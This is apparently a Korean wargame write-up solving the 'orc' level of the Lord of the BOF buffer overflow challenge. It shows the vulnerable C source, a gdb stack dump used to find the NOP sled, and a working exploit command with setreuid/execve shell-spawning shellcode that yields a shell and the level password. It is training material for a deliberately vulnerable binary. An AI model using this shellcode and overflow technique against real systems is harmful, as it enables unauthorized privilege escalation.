문제 소스는 아래와 같다.
/*
The Lord of the BOF : The Fellowship of the BOF
- orc
- egghunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf(argv error\n);
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf(stack is still your friend.\n);
exit(0);
}
strcpy(buffer, argv[1]);
printf(%s\n, buffer);
}환경변수를 다 지우게 되므로 환경변수를 이용할 수 없다. 하지만 argv에 인자로 쉘코드를 넣어줄 수 있으므로 argv를 이용하면 된다.
[goblin@localhost goblin]$ gdb orc_tmp
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) r `python -c print 'A'*44 + 'BBBB' + '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'`
Starting program: /home/goblin/orc_tmp `python -c print 'A'*44 + 'BBBB' + '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'`
Breakpoint 1, 0x8048506 in main ()
(gdb) x/32wx $esp
0xbffe743c: 0x40021ca0 0xbffe7468 0x4000a970 0x400f855b
0xbffe744c: 0x08049680 0x4000ae60 0xbffe74b4 0xbffe7468
0xbffe745c: 0x080484eb 0x0804966c 0x08049680 0xbffe7488
0xbffe746c: 0x400309cb 0x00000002 0xbffe74b4 0xbffe74c0
0xbffe747c: 0x40013868 0x00000002 0x08048450 0x00000000
0xbffe748c: 0x08048471 0x08048500 0x00000002 0xbffe74b4
0xbffe749c: 0x08048390 0x0804860c 0x4000ae60 0xbffe74ac
0xbffe74ac: 0x40013e90 0x00000002 0xbffe759c 0xbffe75b1
(gdb)
0xbffe74bc: 0x00000000 0xbffffcab 0xbffffccd 0xbffffcd7
0xbffe74cc: 0xbffffce5 0xbffffd04 0xbffffd13 0xbffffd2c
0xbffe74dc: 0xbffffd48 0xbffffd53 0xbffffd61 0xbffffda3
0xbffe74ec: 0xbffffdb5 0xbffffdca 0xbffffdda 0xbffffde6
0xbffe74fc: 0xbffffe04 0xbffffe0f 0xbffffe1c 0xbffffe24
0xbffe750c: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffe751c: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffe752c: 0x00001000 0x00000007 0x40000000 0x00000008
(gdb)
0xbffe753c: 0x00000000 0x00000009 0x08048450 0x0000000b
0xbffe754c: 0x000001f7 0x0000000c 0x000001f7 0x0000000d
0xbffe755c: 0x000001f7 0x0000000e 0x000001f7 0x00000010
0xbffe756c: 0x0febfbff 0x0000000f 0xbffe7597 0x00000000
0xbffe757c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe758c: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffe759c: 0x6d6f682f 0x6f672f65 0x6e696c62 0x63726f2f
0xbffe75ac: 0x706d745f 0x41414100 0x41414141 0x41414141
(gdb)
0xbffe75bc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe75cc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe75dc: 0x42424241 0x90909042 0x90909090 0x90909090
0xbffe75ec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe75fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe760c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe761c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe762c: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) q
The program is running. Exit anyway? (y or n) y
[goblin@localhost goblin]$ ./orc `python -c print 'A'*44 + '\x1c\x76\xfe\xbf' + '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv1h//shh/bin
bash$ id
uid=504(orc) gid=503(goblin) egid=504(orc) groups=503(goblin)
bash$ my-pass
euid = 504
cantata
bash$ 